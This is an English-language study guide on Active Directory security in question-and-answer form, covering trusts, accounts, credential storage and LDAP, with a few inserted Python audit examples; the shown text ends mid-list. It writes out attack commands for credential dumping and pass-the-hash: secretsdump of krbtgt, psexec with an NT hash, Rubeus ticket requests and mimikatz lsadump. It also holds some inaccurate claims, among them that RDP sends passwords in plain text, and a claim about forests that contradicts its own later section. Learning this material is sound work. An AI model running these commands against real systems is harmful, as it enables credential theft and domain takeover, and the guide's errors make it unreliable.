S/O
All this documentation was made possible thanks to this website, which goes way deeper into everything listed below. I tried to make it shorter and question-based, but for the technical guys here, you can go and check it out: https://zer1t0.gitlab.io/posts/attacking_ad/
Disclaimer:
English is not my native language, so there may be grammar mistakes in this document. Additionally, as I’m not a cybersecurity professional, there might be technical inaccuracies present. If you notice any mistakes or have suggestions for improvement, please don’t hesitate to reach out. I’m committed to promptly fixing any errors to enhance the quality of the document.
Game Plan, 4 week AD rush
Week 1: Understanding the Basics
- Milestone 1 (End of Week 1):
  - Have a general understanding of the following sections:
    - Domains
    - Trusts
    - Users
    - Groups
    - Computers
    - Authentication
    - Authorization
  - Be able to explain the basic concepts of each section.
Week 2: Deepening Knowledge
- Milestone 2 (End of Week 2):
  - Have a detailed understanding of the following sections:
    - Trust types
    - Trust key
    - User properties
    - Important groups
    - Windows computers connection
    - NTLM
    - ACLs
  - Be able to describe the processes and mechanisms involved in each section.
Week 3: Mastering Advanced Concepts
- Milestone 3 (End of Week 3):
  - Have mastery over the following sections:
    - Trust transitivity
    - How to query the database?
    - Kerberos
    - Kerberos Delegation
    - Powershell remoting
    - SSH tunneling
  - Be able to explain advanced concepts and apply them to specific scenarios.
Week 4: Review and Consolidation
- Milestone 4 (End of Week 4):
- Review all articles and sections to consolidate knowledge.
- Practice exercises or simulations to test your understanding.
- Be capable of explaining each article in detail and answering specific questions on each topic.
What is an Active Directory?
- It’s a system that allows managing a set of computers and users connected to the same network from a central server
Domain
What is a Domain?
- A domain is a set of computers connected to the same AD database, which is managed by the same central server, called the Domain Controller
What is a Domain Name?
- Every domain has a DNS name; it can be the same as the organization’s website domain (contoso.com) or an internal domain (contoso.local)
#current user domain
What is a NetBIOS name?
- It facilitates communication between computers on a local area network (LAN). Every domain can have its NetBIOS name. In the logs, you can identify users as CONTOSO\Administrator, where the first part is the NetBIOS name and the second one is the username.
What is a Forest?
- A forest is a tree of domains. The name of the forest is the name of the root domain (ex: contoso.com) and it has one or more subdomains:
contoso.local
- Each domain has its own database and its own Domain Controllers. Users from a domain can access resources in another domain but not in another forest
What are Functional Modes?
- A functional mode is the version of a domain/forest. The modes are named based on the minimum Windows Server operating system required to work with them. So if, for example, you find a domain/forest with Windows2012 mode, you know that all the Domain Controllers are at least Windows Server 2012.
#Get the mode of the forest/domain
Trust
What are Trusts?
- A trust is what links domains and allows users to access other domains in the same forest. A trust is a connection from one domain to another: not a physical network connection, but a kind of authentication/authorization connection.
What is trust direction?
- A trust direction indicates which domain is trusting and which is trusted: a one-way trust allows the users of the trusted domain to access the trusting domain’s resources
(trusting) trusts (trusted)
Difference between inbound and outbound connection:
- If the trust is directed towards your current domain, it’s an incoming (also called inbound) connection. If it goes from your domain to the other, it’s an outgoing (also called outbound) connection.
#Trust of your current domain
What is Trust transitivity?
- A trust can be transitive or non-transitive. A non-transitive trust indicates that the trust is not extended beyond the immediate relationship: just because entity A trusts entity B and entity B trusts entity C, it does not mean that entity A automatically trusts entity C. A transitive trust, on the other hand, means that trust is passed from one entity to another through a chain of trust relationships: if entity A trusts entity B and entity B trusts entity C, then entity A also implicitly trusts entity C
transitive trust:
(trusting) trusts (trusted) (trusting) trusts (trusted)
- In a domain, to be able to access all the resources, you need all the parents and children to be connected by a bidirectional transitive trust:
contoso.local
What are the different Trust types?
- Parent-Child: The default trusts created between a parent domain and its child.
- Forest: A trust to share resources between forests. This way any domain of the forest can access any domain of the other forest (if the direction and transitivity of the trust allow it). If a forest trust is misconfigured, it can allow taking control of the other forest.
- External: A trust to connect to a specific domain that is in a non-trusted forest.
- Realm: A special trust to connect Active Directory and a non-Windows domain.
- Shortcut: When two domains within the forest communicate often but are not directly connected, you can avoid jumping over many trusts by creating a direct shortcut trust.
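As an added example (not part of these notes or of the zer1t0 post), the following Python models trusts as directed edges and computes which domains a user can reach by applying the direction and transitivity rules above. The trust table, the domain names and the simplified rule that a multi-hop chain only counts when every hop is transitive are my assumptions for the model, not data from a real environment.

```python
from collections import deque

# Constructed trust table (assumption for this model, not a real environment).
# Each entry is (trusting, trusted, transitive): "trusting trusts trusted", so
# users of `trusted` may access resources of `trusting`, as in the diagram above.
TRUSTS = [
    ("contoso.local", "it.contoso.local", True),   # parent-child, bidirectional
    ("it.contoso.local", "contoso.local", True),
    ("contoso.local", "dev.contoso.local", True),  # parent-child, bidirectional
    ("dev.contoso.local", "contoso.local", True),
    ("contoso.local", "fabrikam.local", True),     # one-way forest trust: contoso trusts fabrikam
    ("partner.local", "contoso.local", False),     # one-way external trust, non-transitive
]


def trust_directions(my_domain, trusts=TRUSTS):
    """Classify every trust from my_domain's point of view: outbound when my
    domain is the trusting side, inbound when it is the trusted side."""
    result = {}
    for trusting, trusted, _ in trusts:
        if trusting == my_domain:
            result[trusted] = "bidirectional" if result.get(trusted) == "inbound" else "outbound"
        elif trusted == my_domain:
            result[trusting] = "bidirectional" if result.get(trusting) == "outbound" else "inbound"
    return result


def reachable_domains(user_domain, trusts=TRUSTS):
    """Domains whose resources a user from user_domain can reach.
    Simplified rule (assumption): a direct trust always counts; a chain of
    two or more trusts only counts when every hop in the chain is transitive."""
    # index: trusted domain -> [(trusting domain, transitive)]
    index = {}
    for trusting, trusted, transitive in trusts:
        index.setdefault(trusted, []).append((trusting, transitive))

    reached = {}      # domain -> True if reached through an all-transitive chain
    queue = deque()
    for trusting, transitive in index.get(user_domain, []):
        reached[trusting] = transitive
        if transitive:
            queue.append(trusting)
    while queue:
        here = queue.popleft()
        for trusting, transitive in index.get(here, []):
            if not transitive or trusting == user_domain or reached.get(trusting):
                continue
            reached[trusting] = True
            queue.append(trusting)
    return set(reached)


if __name__ == "__main__":
    for d in ("it.contoso.local", "fabrikam.local", "partner.local"):
        print(d, "->", sorted(reachable_domains(d)))
    print(trust_directions("contoso.local"))
```

Note how the one-way forest trust lets fabrikam users into every domain of the contoso forest, while partner users only reach contoso.local itself because their trust is non-transitive; reviewing the output of `trust_directions` against what the business actually needs is the basic trust hygiene check.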
Explain Trust Keys:
When you communicate through a trust, there is a communication between the domain controller of your domain and the domain controller of the target domain, and the domain controllers need to share a key to keep the communications secure.
Users
Explain User Identifiers;
- User identifiers are what we use to distinguish users. It can be the username (stored in the SamAccountName attribute) or the SID (a combination of the domain SID plus the user RID (Relative Identifier), which is the last number that appears in the user SID)
What are User Secrets?
For the Domain Controller to be able to authenticate the user, the database stores the sensitive data, but not in plaintext. The following secrets are saved:
- NT hash (and LM hash for the older accounts)
- The hashes are stored both in the Windows local SAM and in the Active Directory NTDS databases
- Kerberos keys
You need administrator privileges (or equivalent) to dump the domain database, either with a DCSync attack or by grabbing the C:\Windows\NTDS\ntds.dit file from the Domain Controller.
What can you do with those hashes?
LM hashes are not used a lot because they are often obsolete. NT hashes can be used to perform Pass-The-Hash or Overpass-the-Hash attacks in order to impersonate users on remote machines.
Additionally, you can try to crack the LM and NT hashes with hashcat to recover the original password. If you are lucky and the LM hash is present, this should be quick.
What can you do with kerberos keys?
- The keys can be used to ask for a Kerberos ticket that represents the user in Kerberos authentication. It can be used in a Pass-The-Key attack to retrieve a ticket for the impersonated user.
What is UserAccountControl?
- It’s a property of the user class that contains a series of flags that are very relevant for the security of the domain and are used in many attacks (flags: https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/useraccountcontrol-manipulate-account-properties)
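To make the flags concrete, here is an added Python decoder (my example, not from the notes or the linked Microsoft page). The bit values are the documented UserAccountControl flags; the sample accounts, their values and the list of flags worth reviewing are constructed assumptions for the example.

```python
# UserAccountControl bit flags as documented by Microsoft (the values are real;
# the accounts further down are constructed sample data, not from a real domain).
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}

# Flags a defender reviews first (my selection), with the reason each one matters.
REVIEW_FLAGS = {
    "PASSWD_NOTREQD": "account may have an empty password",
    "DONT_REQ_PREAUTH": "Kerberos pre-authentication not required",
    "TRUSTED_FOR_DELEGATION": "unconstrained delegation: host can impersonate users that connect to it",
    "USE_DES_KEY_ONLY": "weak DES Kerberos keys only",
    "ENCRYPTED_TEXT_PWD_ALLOWED": "password stored with reversible encryption",
    "PASSWD_CANT_CHANGE": "password change blocked: stale credential risk",
}


def decode_uac(value):
    """Names of the flags set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def account_kind(value):
    """What the account represents, based on the *_TRUST_ACCOUNT bits."""
    if value & 0x0800:
        return "trust account (other domain)"
    if value & 0x2000:
        return "domain controller"
    if value & 0x1000:
        return "workstation/server computer"
    return "user"


def audit(accounts):
    """accounts: {sAMAccountName: uac}. Returns {name: [reason, ...]} for enabled
    accounts carrying a flag from REVIEW_FLAGS; disabled accounts are skipped."""
    findings = {}
    for name, uac in accounts.items():
        flags = decode_uac(uac)
        if "ACCOUNTDISABLE" in flags:
            continue
        reasons = [REVIEW_FLAGS[f] for f in flags if f in REVIEW_FLAGS]
        if reasons:
            findings[name] = reasons
    return findings


SAMPLE_ACCOUNTS = {            # constructed values
    "Administrator": 0x10200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD (the usual 66048)
    "svc_legacy": 0x400220,    # NORMAL_ACCOUNT | PASSWD_NOTREQD | DONT_REQ_PREAUTH
    "old_intern": 0x400222,    # same flags, but ACCOUNTDISABLE is set
    "WS01$": 0x1000,           # WORKSTATION_TRUST_ACCOUNT
    "DC01$": 0x82000,          # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION (expected on a DC, still listed)
    "FABRIKAM$": 0x800,        # INTERDOMAIN_TRUST_ACCOUNT: the object that stores a trust key
}

if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS.items():
        print(f"{name:14} {uac:#010x} {account_kind(uac):28} {decode_uac(uac)}")
    print(audit(SAMPLE_ACCOUNTS))
```

The `INTERDOMAIN_TRUST_ACCOUNT` bit is how you tell a trust account (FABRIKAM$, see the Trust accounts question below) apart from a computer account that merely ends in `$`.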
What are some Important Users and how to list them?
net user /domain
The Administrator user is the most privileged account of the domain; the krbtgt account is very important too. Its secrets (NT hash and Kerberos keys) are used to encrypt the tickets (specifically the TGTs) used by Kerberos to authenticate users. If you are able to compromise the krbtgt account, you will be able to create Golden Tickets.
What are Computer accounts and difference with user accounts?
- The difference between user accounts and computer accounts is that the first are stored as instances of the User class in the database whereas the others are stored as instances of the Computer class (which is a subclass of the User class). Moreover, the computer account names are the computer hostname followed by a dollar sign ($).
PS C:\> Get-ADObject -LDAPFilter "objectClass=User" -Properties SamAccountName | select SamAccountName
What are Trust accounts?
- It’s good to know that you can have a normal user whose name ends with a $, but when a trust is established, an associated user object is created in each domain to store the trust key. The name of the user is the NetBIOS name of the other domain, ending in $
- For example, in case of the trust between the domains FOO and BAR, the FOO domain would store the trust key in the BAR$ user, and the BAR domain would store it in the FOO$ user.
Groups
What are groups?
- Rather than managing each user’s file permissions, you put them in groups to handle the policy of all the users in the same group. The groups are stored in the domain database and, in the same way, they can be identified by the SamAccountName or the SID
Get-ADGroup -Filter * | select SamAccountName
Explain Administrative groups:
- There are many default groups defined for different roles in the domain/forest. As an attacker, one of the juiciest groups is the Domain Admins group, which gives administrator privileges in the domain to its members
Get-ADGroup "Domain Admins" -Properties members,memberof
What are other interesting groups:
- The Enterprise Admins group, which provides administrator privileges in the whole forest. It’s a group that only exists in the root domain of the forest, but it is added by default to the Administrators group of all the domains in the forest. There is also the Domain Admins group, which is added to the Administrators group of the domain, as well as to the Administrators groups of the domain computers.
- Other important groups to be taken into account
What are different Group Scopes?
- There are 3 different group scopes:
- Universal groups can include members from any domain within a forest or trusted forests and grant permissions within the same forest or trusted forests. The Enterprise Admins group is an example of a Universal group.
- Global groups can include members only from the same domain and grant permissions within domains of the same forest or trusting domains or forests. The Domain Admins group is an example of a Global group.
- DomainLocal groups can include members from the domain or any trusted domain and grant permissions only within their domains. The Administrators group is an example of a DomainLocal group.
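Because Domain Admins and Enterprise Admins land inside Administrators through nesting (see the administrative groups questions above), the direct member list returned by a query like the Get-ADGroup one is not the real admin population. The following Python is an added example (mine, not from the notes) that expands nested membership both ways and survives a nesting loop; the membership table and the principal names are constructed.

```python
# Constructed membership table (assumption, not a real domain). Each key is a
# group; values are its direct members. A member that is itself a key is a
# nested group, which is how Domain Admins and Enterprise Admins end up inside
# the domain's Administrators group.
MEMBERS = {
    "Administrators": ["Administrator", "Domain Admins", "Enterprise Admins"],
    "Domain Admins": ["Administrator", "alice"],
    "Enterprise Admins": ["Administrator", "bob"],
    "Helpdesk": ["carol", "Tier2"],
    "Tier2": ["dave", "Helpdesk"],   # deliberate nesting loop to exercise the cycle guard
    "Domain Users": ["alice", "bob", "carol", "dave", "eve"],
}


def effective_members(group, members=MEMBERS):
    """Every non-group principal that ends up in `group` through any depth of nesting."""
    seen_groups, users, stack = set(), set(), [group]
    while stack:
        g = stack.pop()
        if g in seen_groups:          # cycle guard: each group is expanded once
            continue
        seen_groups.add(g)
        for m in members.get(g, []):
            if m in members:
                stack.append(m)       # nested group: expand it
            else:
                users.add(m)
    return users


def effective_groups(principal, members=MEMBERS):
    """Transitive memberOf: every group the principal belongs to, directly or through nesting."""
    result = {g for g, ms in members.items() if principal in ms}
    stack = list(result)
    while stack:
        g = stack.pop()
        for parent, ms in members.items():
            if g in ms and parent not in result:
                result.add(parent)
                stack.append(parent)
    return result


def hidden_admins(members=MEMBERS, admin_group="Administrators", expected=("Administrator",)):
    """Principals that are effectively in the admin group but are not the accounts
    you expect there: the list a defender reviews after enumerating group membership."""
    return sorted(effective_members(admin_group, members) - set(expected))


if __name__ == "__main__":
    print("Administrators, expanded:", sorted(effective_members("Administrators")))
    print("alice belongs to:", sorted(effective_groups("alice")))
    print("unexpected admins:", hidden_admins())
```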
Computers
Different types of Computers within a domain:
- Domain Controllers: The central servers that manage the domain. They are Windows Server machines.
- Workstations: The personal computers used by people every day. These machines are usually Windows 10 or 7 machines.
- Servers: The computers that offer services such as web, file or database services. They are usually Linux or Windows Server machines.
What is a domain controller?
- The domain controller is the central server of a domain, running the Active Directory Domain Service (AD DS). It keeps the domain DB stored in the ntds.dit file.
What is Domain database dumping?
- When we become domain admin, in order to read sensitive data like the krbtgt user creds or create Golden Tickets, we can dump the DB of the DC
- One way of doing this is dumping the NTDS.dit file locally with ntdsutil or vssadmin, or remotely with the impacket secretsdump.py script.
secretsdump.py 'contoso.local/Administrator@192.168.100.2' -just-dc-user krbtgt
How to discover Windows computers in a domain or network?
- (The NetBIOS name service listens on port 137) We can scan the network and perform a NetBIOS scan by using a tool like nbtscan or the nmap nbtstat script.
- (SMB listens on port 445) We can take advantage of the NTLM authentication negotiation to retrieve the machine name. You can perform a scan with ntlm-info or the nmap smb-os-discovery script.
How to connect with RPC/SMB
- If you have port 445 open, you can use tools such as PsExec and the impacket examples psexec.py and wmiexec.py (wmiexec.py will also need port 135)
- You can also perform Pass-the-Hash with the NT or LM hash directly with impacket tools:
psexec.py contoso.local/Anakin@192.168.100.10 -hashes :cdeae556dc28c24b5b7b14e9df5b6e21
- With the PsExec tool, inject the NT hash into the Windows session with mimikatz.
With those techniques we connect via NTLM auth, but by default Kerberos is used, and we would need to provide Kerberos tickets to those tools:
- In Windows we will need to inject the ticket into the session by using mimikatz or Rubeus.
Windows and Linux use different ticket formats, which we can convert using ticket_converter or cerbero.
How to use Powershell Remoting to connect
PowerShell Remoting lets you connect to a Windows machine and get a PowerShell session on the remote machine.
- From Windows we need to use cmdlets and parameters
.\Rubeus.exe asktgt /user:Administrator /rc4:b73fdfe10e87b4ca5c0d957f81de6863 /ptt
- From a Linux machine you can use evil-winrm.
How to connect with RDP
- From Windows we can use mstsc
- From Linux we can use rdesktop, freerdp or remmina
- Unlike RPC/SMB, RDP transmits the password in plain text and allows the remote computer to cache the user’s credentials. It enables the user to log in to the remote system without having to enter their password again at each connection, thus simulating the experience of being physically logged into their own machine. This makes it impossible to use pass-the-hash attacks.
- But there is a mode called Restricted Admin: when it is enabled, you don’t send the plain text password, so it’s then possible to perform pass-the-hash connections.
- From Linux, you can use freerdp to perform a Pass-The-Hash with RDP
- And from Windows you can inject an NT hash or Kerberos ticket with mimikatz or Rubeus and then use mstsc.exe /restrictedadmin
Windows computers credentials
Explain LSASS credentials
- On a Windows machine, a common place to find creds is the LSASS process (lsass.exe), which is in charge of user authentication
- When a user logs in, the credentials are cached in the lsass process in order to use SSO. The credentials are cached by some SSPs (Security Support Providers), each one using a different auth method, for example:
  - The Kerberos SSP
  - The Digest SSP
  - The NTLMSSP
- We can extract LSASS credentials using mimikatz. We can launch mimikatz directly on the target machine, or dump the LSASS memory with some tool like procdump, comsvcs.dll or werfault.exe and then process the generated memory dump with mimikatz or pypykatz. It is also possible to use lsassy to read a dump remotely, avoiding having to download the entire memory dump, which can take several megabytes.
Explain Registry credentials
- Another location to find credentials is the registry. One of the places where sensitive credentials are stored is the LSA secrets.
- In the LSA secrets you can find:
  - Domain Computer Account: To be part of the domain, the computer must have a user account in the domain with an available username and password. They are stored in the LSA secrets.
  - Service user passwords: If you want to run some services as a user, the computer needs to store the password, but it does not store the user.
  - Auto-logon password: If Windows auto-logon is enabled, the password can be stored in the LSA secrets. The other alternative is that it is saved in the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key under the key DefaultUserName.
  - DPAPI master keys: The data protection API (DPAPI) is used to allow users to encrypt sensitive data without needing to worry about cryptographic keys. If you are able to retrieve the master keys, then you can decrypt users’ data.
How to dump registry credentials:
To get the credentials from the SECURITY and SAM hives, we can read them from memory by using mimikatz:
- Execute token::elevate to acquire a SYSTEM session to read the credentials.
- Execute privilege::debug if required to enable the SeDebugPrivilege.
Other commands:
- lsadump::secrets: Get the LSA secrets.
- lsadump::cache: Retrieve the cached domain logons.
- lsadump::sam: Fetch the local account credentials.
We can also save a copy of the hive files with the reg save command, move them to our machine, and finally get the content with the impacket secretsdump script or mimikatz.
Linux computers
How to discover linux machines on a network?:
Linux computers don’t have any characteristic port open by default; however, many Linux machines are used as servers that are remotely administered. In order to administer Linux computers, usually the SSH protocol is used. The SSH server service listens on port 22.
Moreover, older Linux machines may have Telnet enabled on port 23.
Where to find Linux computer credentials
Linux machines usually have a Kerberos client that is configured with the domain computer account. You can find the credentials in the keytab (/etc/krb5.keytab) or specified in the Kerberos configuration file in /etc/krb5.conf.
You can use the stored keys to ask for a Kerberos ticket and impersonate the user.
What can you say about linux kerberos tickets?
- In order to be identified within the domain, Linux machines have a Kerberos client configured with the computer account. You can usually find the creds in the /etc/krb5.keytab or /etc/krb5.conf file, and you can display them using the klist command.
- The next step would be to impersonate the user in the domain, since, when authenticated, a Kerberos ticket is retrieved under the /tmp directory in files with the format krb5cc_%{uid}. It is also possible that tickets are stored in the Linux kernel keys instead of files, but you can grab them and convert them to files by using tickey.
Where are stored the ssh private keys?
- Usually they are stored in the .ssh directory in a file called id_rsa
- In case the private key doesn’t require a passphrase to use it, then you may be able to use it to connect to other machines in the domain with this syntax:
$ ssh -i id_ed25519_foo_key foo@db.contoso.local
- A place worth looking at is the bash history, located in the .bash_history file of the user directory, to find some credentials or command history
Services
What is the difference between active directory service and computer service?
A Windows or Linux machine service could be understood as a background process running like a task (ex: a database), but a service is not obliged to be listening on a port: it could simply be a service that, for example, checks for updates on the system.
On the other hand, Active Directory services are identifiers that indicate what remote services are or can be available (listening on a port) on a machine. Not all the remote services are registered in the domain database; however, the registration is required for those services that need to authenticate domain users through Kerberos.
- Each Active Directory service stores this information:
  - The user that runs the computer service.
  - The service class, which indicates what kind of service it is; for example, web servers are registered with the www class.
  - The machine where the service is hosted.
Since services do not need to be running to stay registered in the AD database, it’s good to know that old services can lead to account takeover using Kerberoast.
Database
So we know the basics of the database of the domain and some objects stored in it like users, groups etc..
Can you go more in depth on classes and maybe subclasses?
We know that there is the User class, the Computer class or the Group class.
But a class can have a subclass that inherits its properties. For example, the Computer class is a subclass of the User class, therefore the computer objects can have the same properties as the user objects, like SAMAccountName, and some new custom properties.
All the classes are subclasses of the Top class, and many of the most relevant classes when performing a pentest, like User and Group, are attached to the Security-Principal auxiliary class, the class that defines the SAMAccountName and SID properties.
What do you know about properties of a class?
Usually, properties are stored as a string value like the name or something else. There are some properties that contain sensitive data and are marked as confidential properties; only authorized users can retrieve them.
For example, the UserPassword and UnicodePwd properties cannot be read, only written. When a password change is required, these properties can be written in order to modify the user password.
There are some properties that require certain conditions to be met before being written.
Define principals in active directory?
In Active Directory, a principal is a security entity. The most common principals are users, groups and computers.
What are 3 kinds of SIDs in active directory?
Domain SID: used to identify the domain, as well as the base for SIDs of the domain principals.
Principal SID: used to identify principals. It is composed of the domain SID and a principal RID
Well-known SIDs that identify abstract entities for special situations. Some of them are:
- Authenticated Users
- Principal Self
- Administrator
- Domain Admins
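The three SID kinds listed above (and the domain SID + RID structure from the User Identifiers question) can be told apart mechanically. The following Python is an added example, not from the notes: the well-known SIDs and RIDs are the documented Microsoft values, while the sample domain SID and account names are constructed. The practical check it ends with is spotting a built-in account (RID 500 Administrator, RID 502 krbtgt) that has been renamed.

```python
import re

# Well-known SIDs and RIDs are the documented Microsoft values; the domain SID
# used in the examples below is constructed.
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-10": "Principal Self",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-18": "Local System",
}
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 516: "Domain Controllers",
    518: "Schema Admins", 519: "Enterprise Admins",
}
SID_RE = re.compile(r"^S-1-\d+(?:-\d+)+$")


def classify_sid(sid):
    """Return (kind, well_known_name, domain_sid, rid).
    kind is 'well-known', 'domain', 'principal' or 'invalid'."""
    if not SID_RE.match(sid):
        return ("invalid", None, None, None)
    if sid in WELL_KNOWN_SIDS:
        return ("well-known", WELL_KNOWN_SIDS[sid], None, None)
    parts = sid.split("-")
    # A domain SID looks like S-1-5-21-<a>-<b>-<c>; a principal SID appends one RID.
    if parts[2] == "5" and parts[3] == "21":
        if len(parts) == 7:
            return ("domain", None, sid, None)
        if len(parts) == 8:
            rid = int(parts[7])
            return ("principal", WELL_KNOWN_RIDS.get(rid), "-".join(parts[:7]), rid)
    return ("invalid", None, None, None)


def is_builtin_rid(rid):
    """RIDs below 1000 are reserved for built-in principals; created objects start at 1000."""
    return rid < 1000


def same_domain(sid_a, sid_b):
    """True when both principal SIDs share the same domain SID prefix."""
    dom_a, dom_b = classify_sid(sid_a)[2], classify_sid(sid_b)[2]
    return dom_a is not None and dom_a == dom_b


def find_renamed_builtins(accounts):
    """accounts: {sAMAccountName: sid}. Flags accounts whose RID is a well-known one
    but whose name differs, e.g. a renamed RID-500 Administrator."""
    out = []
    for name, sid in accounts.items():
        kind, known, _, rid = classify_sid(sid)
        if kind == "principal" and known and known != name:
            out.append((name, rid, known))
    return out


if __name__ == "__main__":
    dom = "S-1-5-21-1004336348-1177238915-682003330"   # constructed domain SID
    for s in (dom, dom + "-512", dom + "-1105", "S-1-5-11"):
        print(s, classify_sid(s))
    print(find_renamed_builtins({"root_acct": dom + "-500", "alice": dom + "-1105"}))
```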
What are Distinguished Names?
The distinguished name is like a path that indicates the object’s position in the database hierarchy.
It’s used to identify objects in the DB and to reference objects (ex: the members of a group are referenced by their DistinguishedName).
It’s composed of:
- Domain Component (DC) -> for it.domain.com the DC part will be DC=it,DC=domain,DC=com.
- Organizational Unit (OU)
- Common Name (CN) -> in CN=Administrator,CN=Users,DC=contoso,DC=local, the CN=Users identifies the Users container.
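As an added example (mine, not from the notes), the following Python parses a distinguished name into its RDNs, recovers the domain DNS name from the DC components, builds the reverse mapping, and walks the container path. The escaped-comma case (a CN such as "Doe, John") is the edge case that naive splitting on commas gets wrong; the sample DNs are constructed.

```python
def parse_dn(dn):
    """Split a DN into a list of (attribute, value) RDNs, leftmost first,
    honouring backslash-escaped commas inside values."""
    parts, buf, escaped = [], "", False
    for ch in dn:
        if escaped:
            buf += ch
            escaped = False
        elif ch == "\\":
            buf += ch
            escaped = True
        elif ch == ",":
            parts.append(buf)
            buf = ""
        else:
            buf += ch
    parts.append(buf)
    rdns = []
    for part in parts:
        attr, _, value = part.partition("=")
        rdns.append((attr.strip().upper(), value.strip()))
    return rdns


def domain_dns_name(dn):
    """DNS name of the domain an object lives in: join the DC components."""
    return ".".join(v for a, v in parse_dn(dn) if a == "DC")


def domain_dn(dns_name):
    """Inverse mapping: it.domain.com -> DC=it,DC=domain,DC=com"""
    return ",".join(f"DC={label}" for label in dns_name.split("."))


def parent_dn(dn):
    """The container holding the object (drop the leftmost RDN)."""
    return ",".join(f"{a}={v}" for a, v in parse_dn(dn)[1:])


def container_path(dn):
    """OU/CN containers from the domain root down to the object, e.g. ['Users']."""
    return [v for a, v in reversed(parse_dn(dn)[1:]) if a in ("OU", "CN")]


if __name__ == "__main__":
    admin = "CN=Administrator,CN=Users,DC=contoso,DC=local"       # constructed
    staff = "CN=Doe\\, John,OU=Staff,OU=EMEA,DC=contoso,DC=local"  # constructed, escaped comma
    print(parse_dn(admin))
    print(domain_dns_name(admin), "->", domain_dn(domain_dns_name(admin)))
    print(parent_dn(admin), container_path(staff))
```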
What does the term Partitions refer to in AD databases?
The databases are divided by partitions:
- Domain: Stores the domain objects.
- Configuration: Stores the configuration of the domain, such as the HOST service alias or the Well-known SIDs that we have seen before.
- Schema: Stores the definition of the classes and properties used by the database.
- Domain DNS Zones: Stores the DNS records of the domain and subdomains.
- Forest DNS Zones: Stores the DNS records of the rest of the forest, including parent domains.
How would you define Global Catalog?
To speed up searches through objects in other domains, some domain controllers have read-only partitions with a subset of the objects of other domains. These Domain Controllers are called Global Catalogs
Explain querying with LDAP & ADWS
To be able to interact with the domain controller database and its data, we can use different protocols/services:
LDAP allows you to filter objects, interact with them and edit them in the DB via a query syntax, and you can go more in depth and retrieve properties from the objects you interact with, like the name (you can check out more on the LDAP wiki). We can pretty much interact with anything that is not highly sensitive. When enumerating Active Directory, LDAP is a go-to; you can use the ldapsearch and ldapmodify tools (on Linux). Since we can modify objects, we could imagine adding a user.
On the other hand there is ADWS (Active Directory Web Services), which also manipulates domain objects but is based on SOAP messages. It works very well with LDAP and is compatible with LDAP filters, so much so that when it is used, the DC internally uses LDAP requests to retrieve the results.
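The LDAP query syntax mentioned above is worth seeing built up properly, because a filter assembled by string concatenation from untrusted input (a username typed into a web form, say) can be bent into a different query. This added Python (mine, not from the notes) builds the common enumeration filters and escapes values per RFC 4515; the bitwise matching-rule OID is the real Microsoft one, and the attribute names and sample inputs are assumptions.

```python
# RFC 4515 escaping for values embedded in LDAP search filters. Escaping each
# character independently means a backslash is never double-escaped.
_FILTER_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}

# Real matching-rule OID for bitwise AND on integer attributes (LDAP_MATCHING_RULE_BIT_AND).
BIT_AND = "1.2.840.113556.1.4.803"


def escape_filter_value(value):
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def eq(attr, value):
    return f"({attr}={escape_filter_value(value)})"


def and_(*filters):
    return "(&" + "".join(filters) + ")"


def or_(*filters):
    return "(|" + "".join(filters) + ")"


def not_(f):
    return f"(!{f})"


def bit_set(attr, mask):
    """Matches objects where (attr & mask) == mask, e.g. one userAccountControl flag."""
    return f"({attr}:{BIT_AND}:={int(mask)})"


# Filters you would hand to ldapsearch or an LDAP library when enumerating the domain.
def user_by_sam(sam):
    return and_(eq("objectClass", "user"), eq("sAMAccountName", sam))


def enabled_users():
    """All user objects whose ACCOUNTDISABLE bit (0x2) is clear."""
    return and_(eq("objectClass", "user"), not_(bit_set("userAccountControl", 0x2)))


def group_members_filter(*group_dns):
    """Objects that are a direct member of any of the given groups."""
    return or_(*(eq("memberOf", dn) for dn in group_dns))


if __name__ == "__main__":
    print(user_by_sam("alice"))
    # A value containing filter metacharacters stays a literal value after escaping:
    print(user_by_sam("*)(objectClass=*"))
    print(enabled_users())
    print(group_members_filter("CN=Domain Admins,CN=Users,DC=contoso,DC=local"))
```

Without `escape_filter_value`, the second input would close the `sAMAccountName` clause early and turn the query into one that matches every object; with it, the parentheses and asterisks become `\28`, `\29` and `\2a` and the query matches nothing, which is the outcome a defender wants from a malformed lookup.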
Other protocols worth to know
- The DNS protocol
- The SAMR (Security Account Manager Remote) protocol
- The DRSR (Directory Replication Service Remote) protocol
- The Kerberos authentication protocol
- The Netlogon protocol
Security
The 3 main topics in the security realm of Active Directory are:
Address resolution, Authentication and Authorization
Address resolution
What are some dangers related to misconfigured address resolution?
The main danger is that a user or program can be tricked into connecting to a wrong machine. Some common attacks are:
